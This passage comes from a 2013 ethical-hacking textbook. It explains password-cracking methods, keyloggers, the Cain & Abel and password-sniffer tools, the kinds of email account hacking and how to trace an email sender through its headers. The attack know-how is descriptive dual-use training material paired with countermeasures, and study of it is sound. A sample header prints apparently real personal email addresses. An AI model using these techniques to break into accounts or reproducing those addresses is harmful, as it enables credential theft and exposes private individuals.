their office number, residence number or most commonly, their
mobile number.
 A name of a celebrity they like
 A simple modification of one of the preceding, such as suffixing a
digit, particularly 1, or reversing the order of the letters.
 A swear word
 and so, extensively, on

Personal data about individuals are now available from various sources,
many on-line, and can often be obtained by someone using social
engineering techniques, such as posing as an opinion surveyor or a
security control checker. Attackers who know the user may have

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 113

 Ethical Hacking Part I

information as well. For example, if a user chooses the password

"YaleLaw78" because he graduated from Yale Law School in 1978, a
disgruntled business partner might be able to guess the password.

8.2. 3. Dictionary attacks

55

Users often choose weak passwords. Examples of insecure choices

include the above list, plus single words found in dictionaries, given and
family names, any too short password usually thought to be 6 or 7
characters or less, or any password meeting a too restrictive and so
predictable, pattern e.g. alternating vowels and consonants. Repeated
research over some 40 years has demonstrated that around 40% of user-
chosen passwords are readily guessable by sophisticated cracking
programs armed with dictionaries and, perhaps, the user's personal
information.
In one survey of MySpace passwords obtained by phishing, 3.8 percent of
those passwords were a single word findable in a dictionary, and another
12 percent were a word plus a final digit; two-thirds of the time that digit
was 1.
Some users neglect to change the default password that came with their
computer system account. And some administrators neglect to change
default account passwords provided by the operating system vendor or
hardware supplier. An infamous example is the use of Field Service as a
user name with Guest as the password. If not changed at system
configuration time, anyone familiar with such systems will have 'cracked'
an important password; such service accounts often have higher access
privileges than do a normal user accounts. Lists of default passwords are
available on the Internet. Gary McKinnon, accused by the United States
of perpetrating the "biggest military computer hack of all time", has

55
rafayhackingarticles.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 114
 Ethical Hacking Part I

claimed that he was able to get into the military's networks simply by
using a Perl script that searched for blank passwords; in other words his
report suggests that there were computers on these networks with no
passwords at all.
Cracking programs exist which accept personal information about the
user being attacked and generate common variations for passwords
suggested by that information.

8.2.4.Brute force attack

A last resort is to try every possible password, known as a brute force

attack. In theory, if there is no limit to the number of attempts, a brute
force attack will always be successful since the rules for acceptable
passwords must be publicly known; but as the length of the password
increases, so does the number of possible passwords. This method is
unlikely to be practical unless the password is relatively short; however
techniques using parallel processing can reduce the time to find the
password in inverse proportion to the number of compute devices (CPUs)
in use. This depends heavily on whether the prospective attacker has
access to the hash of the password as well as the hashing algorithm, in
which case the attack is called an offline attack or not, in which case it is
called an online attack. Offline attack is generally much easier, because
testing a password is reduced to a mathematical computation of the
hash of the password to be tried and comparison with the hash of the
real password. In an online attack the attacker has to try to authenticate
himself with all the possible passwords, and rules and delays can be
imposed by the system and the attempts can be logged.
A common password length recommendation is eight or more randomly
chosen characters combining letters, numbers, and special characters.
This recommendation makes sense for systems using stronger password
hashing mechanisms such as md5-crypt and the Blowfish-based bcrypt,
but is inappropriate for many Microsoft Windows systems because they
store a legacy LAN Manager hash which splits the password into two
seven character halves. On these systems, an eight character password
is converted into a seven character password and a one character
password. For better security, LAN Manager Password storage should be
disabled if it will not break supported legacy systems. Systems which
limit passwords to numeric characters only, or upper case only, or
generally those which limit the range of possible password character
choices, also make brute force attacks easier. Using longer passwords in
these cases can compensate for the limited allowable character set. Of
course, even with an adequate range of character choice, users who limit
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 115
 Ethical Hacking Part I

themselves to an obvious subset of the available characters e.g., use only

upper case alphabetic characters, or only digits make brute force attacks
against their accounts much easier.

8.2.5.Pre-computation(Rainbow Tables)
In its most basic form, pre-computation involves hashing each word in
the dictionary or any search space of candidate passwords and storing
the word and its computed hash in a way that enables lookup on the list
of computed hashes. This way, when a new encrypted password is
obtained, password recovery is instantaneous. Pre-computation can be
very useful for a dictionary attack if salt is not used properly which is
explain later, and the dramatic decrease in the cost of mass storage has
made it practical for fairly large dictionaries.
Advanced pre-computation methods exist that are even more effective. By
applying a time-memory tradeoff, a middle ground can be reached - a
search space of size N can be turned into an encrypted database of size
O(N2/3) in which searching for an encrypted password takes time
O(N2/3). The theory has recently been refined into a practical technique.
Another example cracks alphanumeric Windows LAN Manager Passwords
in a few seconds. This is much faster than brute force attacks on the
obsolete LAN Manager, which uses a particularly weak method of
hashing the password. Windows systems prior to Windows Vista/Server
2008 compute and store a LAN Manager hash by default for backwards
compatibility.

8.2.6.Salting

The benefits of pre-computation and memorization can be nullified by

randomizing the hashing process. This is known as salting. When the
user sets a password, a short, random string called the salt is suffixed to
the password before encrypting it; the salt is stored along with the
encrypted password so that it can be used during verification. Since the
salt is usually different for each user, the attacker can no longer
construct tables with a single encrypted version of each candidate
password. Early UNIX systems used a 12-bit salt. Attackers could still
build tables with common passwords encrypted with all 4096 possible
12-bit salts. However, if the salt is long enough, there are too many
possibilities and the attacker must repeat the encryption of every guess
for each user. Modern methods such as md5-crypt and bcrypt use salts
of 48 and 128 bits respectively.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 116

 Ethical Hacking Part I

8.2.7 Keyloggers

56

Keystroke loggers are stealth software packages that are placed between
keyboard hardware and the operating system, So that they can record
every keystroke. There are two types of keystroke loggers.
a) Software Keylogger
It send the attacker email relating to keys typed by the user irrespective
of the memory size. But the disadvantage is it can be detected by the
Anti-virus or malware detector kind of software. In a software keylogger,
attacker usually put his email id and set a timer to get the frequent email
after certain time intervals to see what user has typed.
b) Hardware Keylogger
57

For Hardware Key logger the advantage is

it cannot be detected by any Anti-virus or
any other such software.
Also not every day human attention goes
to the machine. Hence it cannot be
detected easily.
But the disadvantage is installing that
Hardware Keylogger device as well as
removing it from the User's/ Victim's
Machine plus memory limitation.

56
cyberarmy.in
57
hackingduo.blogspot.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 117
 Ethical Hacking Part I

These Keyloggers can be used to steal:

a. passwords
b. confidential information like tender pricing, business secrets etc.
c. communication
d. surveillance
e. getting into someone's privacy.
Authorized use of keylogger is only allowed by the employer on his
employee's machine subject to monitor if the employee is working in
favor of the company or not.

8.3. Software used for Password Cracking

There are many password cracking software tools, but the most popular
are Cain and Abel, John the Ripper, Hydra, ElcomSoft and Lastbit. Many
litigation support software packages also include password cracking
functionality. Most of these packages employ a mixture of cracking
strategies, with brute force and dictionary attacks proving to be the most
productive.

Sniffers are used to capture traffic sent between two systems. Depending
on how the sniffer is used and the security measures in place, a hacker
can use a sniffer to discover usernames, passwords, and other
confidential information transmitted on the network.

Password Sniffer can listen on your LAN and enables network

administrators or parents to capture passwords of any network user.
Currently, Password Sniffer can monitor and capture passwords through
FTP, POP3, HTTP, SMTP, Telnet, and etc.

8.3.1.Password Sniffers

i. Cain & Abel -- Password Sniffer, Cracker and Brute-Forcing Tool

Cain & Abel is a password recovery tool for Microsoft Operating Systems.
It allows easy recovery of various kinds of passwords by sniffing the
network, cracking encrypted passwords using Dictionary, Brute-Force
and Cryptanalysis attacks, recording VoIP conversations, decoding
scrambled passwords, recovering wireless network keys, revealing

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 118

 Ethical Hacking Part I

password boxes, uncovering cached passwords and analyzing routing

protocols. The program does not exploit any software vulnerabilities or
bugs that could not be fixed with little effort. It covers some security
aspects/weakness present in protocol’s standards, authentication
methods and caching mechanisms; its main purpose is the simplified
recovery of passwords and credentials from various sources, however it
also ships some “non standard” utilities for Microsoft Windows users.

1. The Decoders tab allows you to decrypt protected documents,

dialup passwords, and wireless passwords

a) Decoder Tab

Figure 8.1: Cain & Able

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 119

 Ethical Hacking Part I

b) It shows the saved password by selecting particular given option in

left pan.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 120

 Ethical Hacking Part I

2. The Network tab helps you view the browsers, the dial-in servers,
the SQL servers. Time servers and others user in the network.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 121

 Ethical Hacking Part I

3. There is sniffer tab where you can capture the packet which is in
transit state and crack the password.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 122

 Ethical Hacking Part I

4. In cracker tab you can decode the LM Hash, NT Hash value by

password attacking method like Dictionary, Brute force,
Cryptanalysis attack

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 123

 Ethical Hacking Part I

5. The Configuration dialog enables you to modify the ports, HTTP

fields, trace routes and filters."

58

58
http://www.oxid.it/cain.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 124
 Ethical Hacking Part I

ii. Ace Password Sniffer59

New version provides candidates of username or password for HTTP post

submission. Ace Password Sniffer can listen on your LAN and enable
network administrators or parents to capture passwords of any network
user. Currently Ace Password Sniffer can monitor and capture passwords
through FTP, POP3, HTTP, SMTP, Telnet, and etc. Ace Password Sniffer
works passively and don't generate any network traffic, therefore, it is
very hard to be detected by others. And you needn't install any additional
software on other PCs or workstations. If your network is connected
through switch, you can run the sniffer on the gateway or proxy server,
which can get all network traffic. This stealth-monitoring utility is useful
to recover your network passwords, to receive network passwords of
children for parents, and to monitor passwords abuse for server
administrators.

Features:



Efficient you can see the passwords as soon as it appeared on LAN.
Support Various Protocols Fully support application protocols of
FTP, SMTP, POP3, TELNET, etc. That means user names and
passwords used to send and receive emails, to log on a web site, or


to log on a server, can all be captured and saved.
Support HTTP Protocol Support HTTP protocol, including proxy
password, basic http authenticate authorization and most
passwords submitted through HTML, no matter they are encoded


by MIME or base64.
Verify whether the captured passwords are valid It can tell whether
the passwords are right. You can even get the replies from the
server for the login. And it always keeps trying to get valid user
name and password pairs.

59
ace-password-sniffer--including-processing-fee.effetech.fileflash.com/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 125
 Ethical Hacking Part I

8.4. Web-Based Password Cracking Techniques

8.4.1.List the Authentication Types

Web servers and web applications support multiple authentication types.

The most common is HTTP authentication. There are two types of HTTP
authentication: basic and digest. HTTP authentication sends the
username and password in clear text, whereas digest authentication
hashes the credentials and uses a challenge-response model for
authentication.

In addition, web servers and web applications support NTLM, certificate-

based, token-based, and biometric authentication. NTLM authentication
uses Internet Explorer and IIS web servers, making NTLM more suitable
for internal authentication on an intranet that uses the Microsoft
operating systems. Windows 2000 and 2003 servers utilize Kerberos
authentication for a more secure option. Certificate-based authentication
uses an x.509 certificate for public/private key technology. A token, such
as SecurID, is a hardware device that displays an authentication code for
60 seconds; a user uses this code to log in to a network. Biometric
authentication uses a physical characteristic such as fingerprint, eye iris,
or handprint to authenticate the user.

8.4.2.Hacking Tool

i. Webcracker60 is a tool that uses a word list to attempt to log on to

a web server. It looks for the “HTTP 302 object moved” response to
make guesses on the password. From this response the tool can
determine the authentication type in use and attempt to log on to
the system.

8.4.3. Password-Cracking Countermeasures

The best password-cracking countermeasure is to implement strong

passwords that are at least eight characters long and that include
alphanumeric characters. Usernames and passwords should be different,
because many usernames are transmitted in clear text. Complex
passwords that require uppercase, lowercase, and numbers or special

60
http://noorasec.com/books/CEH2010V6.pdf
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 126
 Ethical Hacking Part I

characters are harder to crack. You should also implement a strong

authentication mechanism such as Kerberos or tokens to protect
passwords in transit.

8.4.4. Web Application Countermeasures

Countermeasures exist for common web application vulnerabilities.

Following are countermeasures for each of the web application
vulnerabilities listed in the previous section:

a. Cross-site scripting Validate cookies, query strings, form

fields, and hidden fields.

b. SQL injection Validate user variables.

c. Command injection Use language-specific libraries for the

programming language.

d. Cookie poisoning and snooping Don’t store passwords in a

cookie. Implement cookie timeouts, and authenticate
cookies.

e. Buffer overflow Validate user input length, and perform

bounds checking.
f. Authentication hijacking Use SSL to encrypt traffic.

g. Directory traversal / Unicode Define access rights to

private folders on the web server. Apply patches and
hotfixes.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 127

 Ethical Hacking Part I

CHAPTER 9
EMAIL ACCOUNT HACKING AND TRACING

Objective
9.1 Introduction of E-Mail Hacking
9.2 Explanation of Email headers
9.3 Trace an Email sender

9.1. Introduction of Hacking Email Account

9.1.1. How to Hack Email

61

Email hacking is illegal access to an email account or email

correspondence. Email on the internet is now commonly sent by
the Simple Mail Transfer Protocol (SMTP). This does not encrypt the text
of emails and so intercepted mail can be read easily unless the user adds
their own encryption. The identity of the sender or addressee of an email
is not authenticated and this provides opportunities for abuse such
as spoofing.

61
http://ethicalhackerszone.blogspot.in/2012/07/email-hacking.html

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 128

 Ethical Hacking Part I

Email Spoofing: Email spoofing is a technique used by hackers to

fraudulently send email messages in which the sender address and other
parts of the email header are altered to appear as though the email
originated from a source other than its actual source. Hackers use this
method to disguise the actual email address from which phishing and
spam messages are sent and often use email spoofing in conjunction
with Web page spoofing to trick users into providing personal and
confidential information.

Software is usually used to collect or generate the email addresses that

are spoofed. Hackers may create a virus that examines the contact
information on an infected computer. That information is collected and
sent to the hacker who then uses another piece of software a mass email
program to send out bogus emails using the addresses collected.

Alternatively, hackers may use software that generates random email

addresses to use to disguise the actual origin of the message being sent.

Types of email hacking:

1. Phishing
2. RATS(remote administration tools)
3. Key logging
4. Social Engineering(technique used by attacker by answering
security question)
5. Side jacking(Session Hijacking)
6. From the mail server

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 129

 Ethical Hacking Part I

1. PHISHING

Phishing is an e-mail fraud method in which the Hacker sends out

legitimate-looking email in an attempt to gather personal and
financial information from recipients. Typically, the messages appear
to come from well-known and trustworthy Web sites. Web sites that
are frequently spoofed by phishes include PayPal, eBay, MSN, Yahoo,
Best Buy, and America Online. A phishing expedition, like the fishing
expedition it's named for, is a speculative venture: the phisher puts
the lure hoping to fool at least a few of the prey that encounter the
bait.

Techniques used within Phishing emails:

1. Official looking and sounding emails

2. Copies of legitimate corporate emails with minor URL changes
3. HTML based email used to confuse target URL information
4. Standard virus/worm attachments to emails
5. A excess of anti spam-detection inclusions
6. Crafting of “personalized” or unique email messages
7. Fake postings to popular message boards and mailing lists
8. Use of fake “Mail From:” addresses and open mail relays for
disguising the source of

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 130

 Ethical Hacking Part I

An Example of a Fake Gmail Home Page:

Things to keep in mind to avoid Phising attacks:

1. Most fake communications convey a sense of urgency by

threatening discontinued service
2. Many fraudulent emails contain misspellings, incorrect grammar,
and poor punctuation.
3. Links within the fake email may appear valid but deliver you to a
fraudulent site.
4. Phishing emails often use generic salutations like "Dear
Customer," or "Dear account holder," instead of your name the
address from which the email was sent is often not one from the
company it claims to be.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 131

 Ethical Hacking Part I

An Example Of a Fake Email

2. RATS(Remote Administration Tools)

A RAT is also a shortcut called Remote Administrator Tool. It is mostly

used for malicious purposes, such as controlling PC’s, stealing victims
data, deleting or editing some files. You can only infect someone by
sending him file called Server and they need to click it.

3. KEY LOGGING

Keystroke logging (more often called keylogging or "keyloggers") is the

action of tracking (or logging) the keys struck on a keyboard, typically in
a secret manner so that the person using the keyboard is unaware that
their actions are being monitored. There are numerous key logging
methods, ranging from hardware and software-based approaches to
electromagnetic and acoustic analysis.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 132

 Ethical Hacking Part I

Types Of Keyloggers:
1.Software-based Keyloggers
2.Hardware-based Keyloggers

1. Software-based Keyloggers
Software based Keyloggers record each and every keystroke typed with
the help of Software. These keystrokes are stored in a log file.

An example of Keystroke log file

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 133

 Ethical Hacking Part I

2. Hardware-based Keyloggers
Hardware based keyloggers record each and every keystroke typed with
the help of a
Hardware device.
An Example of a typical Hardware Keylogger

An Example of how Hardware Keyloggers are connected to the

system

Countermeasures
Use of Virtual keyboard or On-Screen Keyboard can be an effective
method to avoid
Keyloggers. But it will not work under certain circumstances.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 134

 Ethical Hacking Part I

4. SOCIAL ENGINEERING (Technique Used By Attacker By Answering

Security Question)

Social engineering is the human side of breaking into a corporate

network. Companies like ours with authentication processes, firewalls,
VPNs and network monitoring software are still wide open to an attack if
an employee unwittingly gives away key information in an email, by
answering questions over the phone with someone they don’t know or
failing to ask the right questions.

Forms of Social Engineering:

Social engineering is not limited to phone calls; many organizations have

reported cases involving visitors impersonating a telephone repair
technician requesting access to a wiring closet or a new member of the IT
department needing help accessing a file.

People, for the most part, look at social engineering as an attack on their
intelligence and no one wants to be considered “ignorant” enough to have
been a victim. It’s important to remember that no matter who you are,
you are susceptible to a social engineering attack.

If you suspect social engineering – don’t be afraid to ask questions

and/or notify your IT department. If a caller requests information that is
technical in nature, please refer them to your IT department.

How to prevent social Engineering

Never give out

1. Usernames; Administrators should know it or can find out

themselves

2. Passwords; Administrators can ask you to enter it into the

computer, but don't tell anyone

3. ID numbers

4. PIN numbers

5. Server names

6. System information
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 135
 Ethical Hacking Part I

5. SIDE JACKING (Session Hijacking)

Session Hijacking is an attack by which a hacker exploits a valid
computer session and gains access to a client’s session identifier. Since
HTTP is a stateless protocol, when a user logs into a website, a session is
created on that Web Server for that user, this session contains all this
user's information being used by the server so the username and
password is not needed at every page request. The server uses a unique
identifier(Session Identifier) to authenticate this user to this session, this
session identifier is passed between the web server and the user's
computer at every request. Session Hijacking is an attack by which the
hacker steals this user's session identifier and then sends this session
identifier as their own to the server and tricks the server into thinking
they are that user.
After gaining access to a client’s session identifier for a website, the
hacker then injects the client’s session identifier into his/her browser.
From then on, when that attacker connects to that website, since his
session identifier is the same as the authentic user, he will be logged in
as that user and will have access to all of that user’s information and
privileges on that website. Note - attackers cannot get a user’s password
using session hijacking.

1.Use Secure Connections (Achieved through Secure Socket Layer(SSL)

as much as possible, since SSL creates an encrypted connection
between the client and server, any data the attacker steals during this
transfer would be useless to them. However, SSL does not fully secure
against this attack, and hackers can still use session hijacking even
over HTTPS

2.Regenerate user's session identifier often, therefore, even though the

attacker may manage to steal a user's session identifier, when it is
regenerated, the Session Identifier he stole would be useless.

3. You can implement an IP Address Check to match a user's Session

Identifier to his/her IP Address. However this may have its
limitations.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 136

 Ethical Hacking Part I

6. FROM THE MAIL SERVER

Databases have been the heart of a commercial website. An attack on
the database servers can cause a great monetary loss for the
company. Database servers are usually hacked to get the credit
card information. And just one hack on a commercial site will bring down
its reputation and also the customers as they also want their credit card
info secured.62

9.2. Email headers of various Email service providers

9.2.1. Email header63

The email header is the information that travels with every email,
containing details about the sender, route and receiver. It is like a flight
ticket: it can tell you who booked it (who sent the email), the departure
information (when the email was sent), and the route (from where it was
sent and how did it arrive to you) and arrival details (who is the receiver
and when it was received). As when you would book a flight ticket with a
false identity, the same goes for emails: the sender can partially fake
these details, pretending that the email was sent from a different account
(common practice for spammers or viruses).

9.2.2.How do you see an email header?

It depends on your email Service. Methods to see the email header

1. Check Email header of Gmail

i. Click on mail which you want to see header

ii. Go to right side there is two links 1. Show details 2. Reply

iii. Near to the reply link there is drop down menu, just click on that
menu list will appear. Click show original option.

62
http://ethicalhackerszone.blogspot.in/2012/07/email-hacking.html
63
http://www.emailaddressmanager.com/tips/header.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 137
 Ethical Hacking Part I

Figure 9.1: Checking Email Header

iv. Headers will appear in new window as below:

Delivered-To: madhu.itgirl@gmail.com

Received: by 10.103.251.18 with SMTP id d18cs63161mus;

Fri, 12 Dec 2008 22:49:50 -0800 (PST)

Received: by 10.142.191.5 with SMTP id

o5mr1713828wff.349.1229150988588;

Fri, 12 Dec 2008 22:49:48 -0800 (PST)

Return-Path:<bam_kumar@yahoo.co.in>

Received: from web8408.mail.in.yahoo.com

(web8408.mail.in.yahoo.com [202.43.219.156])

by mx.google.com with SMTP id

27si4917797wfa.9.2008.12.12.22.49.45;

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 138

 Ethical Hacking Part I

Fri, 12 Dec 2008 22:49:47 -0800 (PST)

Received-SPF: neutral (google.com: 202.43.219.156 is neither

permitted nor denied by domain of bam_kumar@yahoo.co.in) client-
ip=202.43.219.156;

Domain Key-Status: good (test mode)

Authentication-Results: mx.google.com; spf=neutral (google.com:

202.43.219.156 is neither permitted nor denied by domain of
bam_kumar@yahoo.co.in) smtp.mail=bam_kumar@yahoo.co.in;
domainkeys=pass (test mode) header. From=bam_kumar@yahoo.co.in

Received: (qmail 3052 invoked by uid 60001); 13 Dec 2008 06:49:44 -

0000

DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;

s=s1024; d=yahoo.co.in;

h=X-YMail-OSG:Received:X-Mailer:Date:From:Reply-
To:Subject:To:MIME-Version:Content-Type:Message-ID;
b=xg5trRzbHxp4yLC6psh5mlZ0atalSpD8KqbgPPDylK6M2fa02ags6j9wY
HrQOoqiBeS9CJB6zjgQpdljyDwXzzt+N6jSrXI62DZypgIFpMCB2eBsx1Gj
rPIk/95osByfIKwf99wumBu1tWckNs4H7BuIWqMAY0tjIKe+quWpaB8=;

X-YMail-OSG:
N1_an9AVM1m0WfzSSQl.Wbr5qsT0O7aaCZ2FZdGVKPaSe2XibQc_rgNA
Ufqpcovokzz_ZCdizVbZqogM55GTObUsSHv_6dF531Vh5vdJePKyCew8c
H_HqysheUXse1AvceoyNqEo5S9htPBHqpa8iLRb_xzzs1wt8a22Uq9XVHs
j0mwfCnTy2Q.Wd6omlSStdy5XMnESx38MvAPlXUa4MG2oqnaRjG35gv
Atg95QMO_tuZGD3g--

Received: from [59.94.42.254] by web8408.mail.in.yahoo.com via

HTTP; Sat, 13 Dec 2008 12:19:44 IST

X-Mailer:YahooMailWebService/0.7.260.1

Date: Sat, 13 Dec 2008 12:19:44 +0530 (IST)

From:Adarshkumar<bam_kumar@yahoo.co.in>

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 139

 Ethical Hacking Part I

Reply-To: bam_kumar@yahoo.co.in

Subject: CCNA Security

To:MadhuKumari<madhu_great_girl@yahoo.co.in>,

MadhuKumari<madhu.itgirl@gmail.com>

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="0-1692875076-

1229150984=:3032"

Message-ID: <521154.3032.qm@web8408.mail.in.yahoo.com>

Email Headers of Yahoo

i. In yahoo you find email headers at the bottom right corner as

show header option of received mail.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 140

 Ethical Hacking Part I

9.2.3. How to read email headers

A. Time

Time zone is in India

India Time Standard Time is 5.5 hours (5 hours 30 minutes) ahead of

Greenwich Mean Time (GMT+5.5).
 IST Indian Standard Time (GMT +05:30)
 PST Pacific Standard Time (GMT-0800)
 GMT Greenwich Mean Time (GMT)

B. List of Common Headers

 Apparently-To: Messages with many recipients sometimes have a

long list of headers of the form "Apparently-To: rth@bieberdorf.edu"
(one line per recipient). These headers are unusual in legitimate
mail; they are normally a sign of a mailing list and in recent times
mailing lists have generally used software sophisticated enough
not to generate a giant pile of headers.

 Bcc: (stands for "Blind Carbon Copy") If you see this header on
incoming mail, something is wrong. It's used like Cc: (see below),
but does not appear in the headers. The idea is to be able to send
copies of email to persons who might not want to receive replies or
to appear in the headers. Blind carbon copies are popular with
spammers, since it confuses many inexperienced users to get email
that doesn't appear to be addressed to them.

 Cc: (stands for "Carbon Copy", which is meaningful if you

remember typewriters) This header is sort of an extension of "To:".
It specifies additional recipients. The difference between "To:" and
"Cc:" is essentially connotative; some mailers also deal with them
differently in generating replies.

 Comments: This is a nonstandard, free-form header field. It's most

commonly seen in the form "Comments: Authenticated sender is
<rth@bieberdorf.edu>". A header like this is added by some mailers
(notably the popular freeware program Pegasus) to identify the
sender; however, it is often added by hand (with false information)
by spammers as well. Treat with caution.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 141

 Ethical Hacking Part I

 Content-Transfer-Encoding: This header relates to MIME, a

standard way of enclosing non-text content in email. It has no
direct relevance to the delivery of mail, but it affects how MIME-
compliant mail programs interpret the content of the message.

 Content-Type: Another MIME header, telling MIME-compliant

mail programs what type of content to expect in the message.

 Date: This header does exactly what you'd expect: It specifies a

date, normally the date the message was composed and sent. If
this header is omitted by the sender's computer, it might
conceivably be added by a mail server or even by some other
machine along the route. It shouldn't be treated as gospel truth;
forgeries aside, there are an awful lot of computers in the world
with their clocks set wrong.

 Errors-To: Specifies an address for mailer-generated errors, like

"no such user" bounce messages, to go to (instead of the sender's
address). This is not a particularly common header, as the sender
usually wants to receive any errors at the sending address, which
is what most (essentially all) mail server software does by default.



From (without colon) this is the "envelope from" discussed above.
From: (with colon) this is the "message from:" discussed above.

 Message-Id: (also Message-id: or Message-ID:) The Message-Id is a

more-or-less unique identifier assigned to each message, usually
by the first mail server it encounters. Conventionally, it is of the
form "gibberish@bieberdorf.edu", where the "gibberish" part could
be absolutely anything and the second part is the name of the
machine that assigned the ID. Sometimes, but not often, the
"gibberish" includes the sender's username. Any email in which the
message ID is malformed (e.g. an empty string or no @ sign), or in
which the site in the message ID isn't the real site of origin, is
probably a forgery.

 In-Reply-To: A Usenet header that occasionally appears in mail,

the In-Reply-To: header gives the message ID of some previous
message which is being replied to. It is unusual for this header to
appear except in email directly related to Usenet; spammers have

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 142

 Ethical Hacking Part I

been known to use it, probably in an attempt to evade filtration

programs.

 Mime-Version: (also MIME-Version:) Yet another MIME header,

this one just specifying the version of the MIME protocol that was
used by the sender. Like the other MIME headers, this one is
usually eminently ignorable; most modern mail programs will do


the right thing with it.
Newsgroups: This header only appears in email that is connected
with Usenet---either email copies of Usenet postings, or email
replies to postings. In the first case, it specifies the newsgroup(s) to
which the message was posted; in the second, it specifies the
newsgroup(s) in which the message being replied to was posted.
The semantics of this header are the subject of a low-intensity holy
war, which effectively assures that both sets of semantics will be
used indiscriminately for the foreseeable future.

 Organization: A completely free-form header that normally

contains the name of the organization through which the sender of
the message has net access. The sender can generally control this
header, and silly entries like "Royal Society for Putting Things on
Top of Other Things" are commonplace.

 Priority: An essentially free-form header that assigns a priority to

the mail. Most software ignores it. It is often used by spammers,
usually in the form "Priority: urgent" (or something similar), in an
attempt to get their messages read.

 Received: Discussed in detail above.

 References: The References: header is rare in email except for

copies of Usenet postings. Its use on Usenet is to identify the
"upstream" posts to which a message is a response; when it
appears in email, it's usually just a copy of a Usenet header. It may
also appear in email responses to Usenet postings, giving the
message ID of the post being responded to as well as the references
from that post.

 Reply-To: Specifies an address for replies to go to. Though this

header has many legitimate uses (perhaps your software mangles
your “From:” address and you want replies to go to a correct
address), it is also widely used by spammers to deflect criticism.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 143

 Ethical Hacking Part I

Occasionally a naive spammer will actually solicit responses by

email and use the Reply-To: header to collect them, but more often
the Reply-To: address in junk email is either invalid or an innocent
victim.

 Sender: This header is unusual in email (X-Sender: is usually

used instead), but appears occasionally, especially in copies of
Usenet posts. It should identify the sender. In the case of Usenet
posts, it is a more reliable identifier than the “From:” line.

 Subject: A completely free-form field specified by the sender,

intended of course to describe the subject of the message.

 To: The "message to:"described above. Note that the To: header
need not contain the recipient's address!

 X-headers are the generic term for headers starting with a capital
X and a hyphen. The convention is that X-headers are
nonstandard and provided for information only and that,
conversely, any nonstandard informative header should be given a
name starting with "X-". This convention is frequently violated.

 X-Confirm-Reading-To: This header requests an automated

confirmation notice when the message is received or read. It is
typically ignored; presumably some software acts on it.

 X-Distribution: In response to problems with spammers using his

software, the author of Pegasus Mail added this header. Any
message sent with Pegasus to a sufficiently large number of
recipients has a header added that says "X-Distribution: bulk". It is
explicitly intended as something for recipients to filter against.

 X-Errors-To: Like Errors-To:, this header specifies an address for

errors to be sent to. It is probably less widely obeyed.

 X-Mailer: (also X-mailer :) A freeform header field intended for the

mail software used by the sender to identify itself (as advertising or
whatever). Since much junk email is sent with mailers invented for
the purpose, this field can provide much useful fodder for filters.

 X-PMFLAGS: This is a header added by Pegasus Mail; its

semantics are no obvious. It appears in any message sent with

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 144

 Ethical Hacking Part I

Pegasus, so it doesn't obviously convey any information to the

recipient that isn't covered by the X-Mailer: header.

 X-Priority: Another priority field, used notably by Eudora to

assign a priority (which appears as a graphical notation on the
message).

 X-Sender: The usual email analogue to the Sender: header in

Usenet news, this header purportedly identifies the sender with
greater reliability than the from: header. In fact, it is nearly as easy
to forge, and should therefore be viewed with the same sort of
suspicion as the from: header.

 X-UIDL: This is a unique identifier used by the POP protocol for

retrieving mail from a server. It is normally added between the
recipient's mail server and the recipient's actual mail software; if
mail arrives at the mail server with an X-UIDL: header, it is
probably junk (there's no conceivable use for such a header, but
for some unknown reason many spammers add one).

9.3. Trace the e-mail sender

9.3.1. Identifying the fake mail

For identifying fake mails there are following steps:

For example: Gmail

1. Open your account by providing your username and password
2. Open the specific mail
3. Go to header of that mail
4. For opening he header in Gmail, there are following steps:
A) First take header of genuine mail
i. Go to reply and click on drop down menu
ii. Click on Show original
iii. When you click on show original, the new window appears
i.e. header of that specific mail.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 145

 Ethical Hacking Part I

Figure 9.2: Genuine mail

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 146

 Ethical Hacking Part I

iv. In the same way open the header of fake mail also.

Figure 9.3: Fake mail

v. For identify the mail whether it is fake or genuine compare

header of the both mails and match following option with
marked arrow in fake header.
vi. You will find the difference between both the headers for
same user.
vii. Differences may be varying from service to service, so it is
not same all the time.
viii. Whenever you open the header you should see the
following option as below:
a) Return Path
b) Received from
c) X-mailer
d) Message id
e) X-originating-ip

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 147

 Ethical Hacking Part I

Figure 9.4: Header of genuine mail

ix. Match both of the headers, you will get the following
highlighted changes

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 148

 Ethical Hacking Part I

Figure 9.5: Header of Fake mail

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 149

 Ethical Hacking Part I

9.3.2. Trace email sender64

As you know Internet emails are designed to carry the IP address of the
computer from which the email was sent. This IP address is stored in an
email header delivered to the recipient along with the message. Email
